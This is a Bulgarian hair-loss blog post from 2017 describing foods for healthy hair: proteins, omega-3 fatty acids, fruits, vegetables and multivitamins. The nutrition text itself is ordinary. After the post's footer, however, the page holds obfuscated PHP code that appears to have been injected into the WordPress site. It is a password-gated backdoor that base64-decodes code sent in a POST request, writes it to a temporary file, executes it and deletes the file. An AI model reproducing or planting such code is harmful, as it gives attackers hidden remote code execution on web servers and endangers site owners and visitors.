Най- полезните храни за здрава и красива коса | Косопад

Най- полезните храни за здрава и красива коса

kosa-hrani-2

Правилното хранене помага да имаме здрава и красива коса. Ако обаче не приемаме здравословна храна, това се отразява и на здравето, и на косата. Балансираното ежедневно меню ни осигурява необходимите полезни вещества, за да сме здрави.

Състоянието на косата е много важен знак за здравето ни. Красотата и здравината на косата се влияят директно от количеството на приеманите витамини, минерали и протеини. А приемът на достатъчно вода я поддържа хидратирана и жизнена.

Консумация на протеини
Приемът на достатъчно протеини подобрява състоянието на косата. Някои източници на протеини съдържат и полезни мазнини, като различните видове ядки. Бобовите култури също съдържат протеини. От животинските източници на протеини, най- ценните са: яйца, риба, млечни продукти, месо. Недостигът на протеини се отразява много негативно на косата

kosa-hrani-1

Мастни киселини
Съдържат се в рибата, ядките, авокадото и др. Омега- 3 мазнините са полезни не само за косата, но и за здравето на целия организъм.

Витамини и минерали
Не всички витамини и минерали можем да си набавим чрез храната. Затова, можем да приемаме мултивитамини в определени месеци на годината. Малко след началото на приема, ще усетим приток на енергия.

За да си набавяме витамини и минерали по естествен път, трябва да наблягаме на плодовете и зеленчуците. Да се стараем да се храним балансирано.

08. август 2017 14:43:50 от Надя Колева
Категории: Любопитно за косопада | Етикети: , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}